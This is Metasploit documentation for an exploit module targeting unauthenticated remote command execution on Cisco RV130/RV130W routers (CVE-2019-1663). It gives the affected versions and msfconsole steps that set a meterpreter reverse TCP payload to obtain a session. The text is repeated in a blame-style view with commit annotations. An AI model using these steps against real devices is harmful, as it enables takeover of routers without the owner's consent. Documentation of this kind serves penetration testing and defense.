documentation/modules/exploit/linux/http/cisco_rv130_rmi_rce.md

# Cisco RV130W Routers Management Interface Remote Command Execution

A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.

The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.

A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
system of the affected device as a high-privilege user.

## Vulnerable Device

* RV130 Multifunction VPN Router versions prior to 1.0.3.45 are affected.
* RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.

This exploit was specifically written against version 1.0.3.28. To test, you can find the
firmware here: https://software.cisco.com/download/home/285026141/type/282465789/release/1.0.3.28

## Verification Steps

1. Start msfconsole
2. ```use exploit/linux/http/cisco_rv130_rmi_rce```
3. ```set rhost [IP]```
4. ```set payload linux/armle/meterpreter_reverse_tcp```
5. ```set lhost [IP]```
6. ```exploit```
7. You should get a session
Exploit for CVE-2019-1663 on Cisco RV130(W). 2019-03-22 17:34:12 +01:00			`# Cisco RV130W Routers Management Interface Remote Command Execution`

			`A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.`

			`The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.`

			`A successful exploit could allow the attacker to execute arbitrary code on the underlying operating`
			`system of the affected device as a high-privilege user.`

			`## Vulnerable Device`

			`* RV130 Multifunction VPN Router versions prior to 1.0.3.45 are affected.`
			`* RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.`

			`This exploit was specifically written against version 1.0.3.28. To test, you can find the`
			`firmware here: https://software.cisco.com/download/home/285026141/type/282465789/release/1.0.3.28`

			`## Verification Steps`

			`1. Start msfconsole`
			2. ```use exploit/linux/http/cisco_rv130_rmi_rce```
Fix numbering. 2019-03-24 17:52:11 +01:00			3. ```set rhost [IP]```
			4. ```set payload linux/armle/meterpreter_reverse_tcp```
			5. ```set lhost [IP]```
			6. ```exploit```
			`7. You should get a session`
Exploit for CVE-2019-1663 on Cisco RV130(W). 2019-03-22 17:34:12 +01:00